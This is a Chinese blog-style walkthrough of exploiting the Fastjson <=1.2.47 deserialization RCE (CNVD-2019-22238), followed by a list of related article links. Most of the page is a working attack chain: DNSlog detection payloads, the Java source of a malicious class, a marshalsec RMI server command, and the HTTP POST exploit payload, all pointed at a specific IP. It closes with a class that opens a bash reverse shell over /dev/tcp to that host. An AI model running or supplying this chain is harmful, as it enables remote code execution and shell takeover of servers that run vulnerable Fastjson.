rmi反序列化导致rce漏洞修复_企业安全05-Fastjson =1.2.47反序列化RCE漏洞(CNVD-2019-22238)...
Fastjson <=1.2.47反序列化RCE漏洞(CNVD-2019-22238)
一、漏洞描述
Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。
二、影响版本
Fastjson1.2.47以及之前的所有版本
三、环境搭建
vulhub靶场,进入fastjson漏洞环境目录下,执行
cd 1.2.47-rce/
docker-compose up -d
四、漏洞检测
手动检测:
{"a":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"a":{"@type":"java.net.Inet6Address","val":"dnslog"}}
{"a":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}
{"a":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}}
{"a":{"@type":"java.net.URL","val":"dnslog"}}
五、漏洞复现
1、编译上传TouchFile.class
这里的TouchFile是要编译好的恶意类,将编译好的TouchFile.class放在tomcat webapps/ROOT 目录下,java源码如下
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
2、编译需要使用java环境,安装步骤如下
sudo apt-get update #更新软件包列表:
sudo apt install default-jre #安装默认jre
java -version #查看java版本
javac TouchFile.java #编译为TouchFile.class
3、安装docker 拉起tomcat
curl -s https://get.docker.com/ | sh
curl -s https://bootstrap.pypa.io/get-pip.py | python
pip install docker-compose
docker search tomcat #搜索镜像(默认去Docker Hub查找)
docker pull tomcat:8.0.52 #指定版本拉取tomcat
docker images #拉取成功查看拉取的镜像
docker run --name ytomcat -d -p 8081:8080 tomcat:8.0.52 #根据镜像启动一个容器
4、宿主机向Docker容器传送文件
docker cp 本地文件的路径 container_id:
docker cp /root/TouchFile.class 5eff9f38e0c7:/usr/local/tomcat/webapps/ROOT #例子
mkdir TouchFile #创建TouchFile目录
mv TouchFile.class TouchFile #将TouchFile.class剪切到TouchFile目录里
将exp.class上传至你的web服务器,地址为http://yours_ip/exp/TouchFile.class。
我的地址为:http://8.210.235.249/TouchFile/TouchFile.class
5、借助marshalsec项目,快速开启rmi或ldap服务
apt install git #安装git
git clone https://github.com/mbechler/marshalsec #下载marshalsec
apt install maven #下载maven,使用maven进行编译jar包
cd marshalsec
mvn clean package -DskipTests
启动一个RMI服务器,监听9988端口,并制定加载远程类TouchFile.class:
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://8.210.235.249/#TouchFile" 9988
6、发送Payload
POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://8.210.235.249/exp",
"autoCommit":true
}
}
至此漏洞复现成功
六、反弹shell
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/8.210.235.249/6666 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
和前边同理:
编译-->将TouchFile.class上传至web服务器-->启动RMI服务器监听端口-->nc 监听端口-->burpsuite发送Payload
rmi反序列化导致rce漏洞修复_企业安全05-Fastjson =1.2.47反序列化RCE漏洞(CNVD-2019-22238)...相关推荐
- 漏洞poc和漏洞利用_带HTML的PowershellHTML空白空间隐写术和二进制漏洞利用交付[PoC]
漏洞poc和漏洞利用 实用隐写术 (Practical Steganography) A few years ago I came across a very academic challenge: ...
- 织梦漏洞修复大全(使用织梦建站,有许多漏洞)现在整理了一些
文章目录 使用织梦建站,阿里云中反馈了许多漏洞 1.member文件夹下的漏洞 2.dedecms /include/payment/alipay.php支付模块注入漏洞修复方案 3./include ...
- mysql sql注入漏洞修复_从Java角度修复SQL注入漏洞
很多情况因为过滤不严导致很多网站存在sql注入,这里以用户登陆为例,简单举例 首先创建一个测试的数据库 比较基础,不写创建过程了 java代码如下: packagecn.basic.jdbc;impo ...
- rc4加密问题漏洞修复_「ssl漏洞」网站SSL安全漏洞修复指南
前段时间对公司的网站进行了一下扫描,使用的是awvs扫描器,发现了几处SSL方面的安全漏洞,网上找了一些修复的建议,分享给大家,如果你也遇到和我一样的问题,可以用此修复. Web网站的SSL漏洞主要包 ...
- fastjson jar包_Fastjsonlt;=1.2.47反序列化RCE漏洞(CNVD201922238)
Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238) 一.漏洞描述 Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 ...
- Fastjson 1.2.24 反序列化漏洞复现
Fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎.Fastjson是其中的一个基于Java的JSON解析器/生成器. Pippo ...
- 关于ECSHOP中sql注入漏洞修复
标签:ecshop sql注入漏洞修复 公司部署了一个ecshop网站用于做网上商城使用,部署在阿里云服务器上,第二天收到阿里云控制台发来的告警信息,发现ecshop网站目录下文件sql注入漏洞以及程 ...
- 中科方德服务器操作系统找到外置光盘,方德高可信服务器操作系统Meltdown和Spectre漏洞修复-中科方德.PDF...
方德高可信服务器操作系统Meltdown和Spectre漏洞修复-中科方德 方德高可信服务器操作系统Meltdown和 Spectre 漏洞修复指南 导读:近日爆出的Intel CPU特性漏洞分为&q ...
- java+poodle漏洞修复_SSL3.0 POODLE漏洞修复方案
SSL3.0 POODLE漏洞修复方案 发布时间:2014-10-15 15:02:27 关于SSLPOODLE漏洞 POODLE = Padding Oracle On Downgraded Leg ...
最新文章
- sm2加密算法实例_实例说明加密算法
- 【鸿蒙 HarmonyOS】UI 组件 ( Text 组件 )
- javafx 安装_JDK安装教程及环境配置
- 第一个helloworld.c实例
- Underscore.js 的模板功能
- oracle 只导出指定的表格,expdp带条件导出单个表的数据
- 准确率,召回率,F值,机器学习分类问题的评价指标
- jquery层次选择器:空格 > next + nextAll ~ siblings
- C结构和C++结构之间的区别是什么?
- BookCorpus数据集爬虫
- 计算机网络安全工作台账,网络安全工作自查报告(2)
- 备战2022年5月软考高项 —— 信息系统项目管理师
- vue项目-添加商品的多规格
- 服务器配置的各种英文简称
- 汉字转拼音和简拼工具类分享
- java之MySQL事务处理
- sja1000 中断_SJA1000程序
- 现在进行时的被动语态
- 强推!!!解决UnicodeEncodeError: ‘gbk‘ codec can‘t encode character.....: illegal multibyte
- Matlab入门基础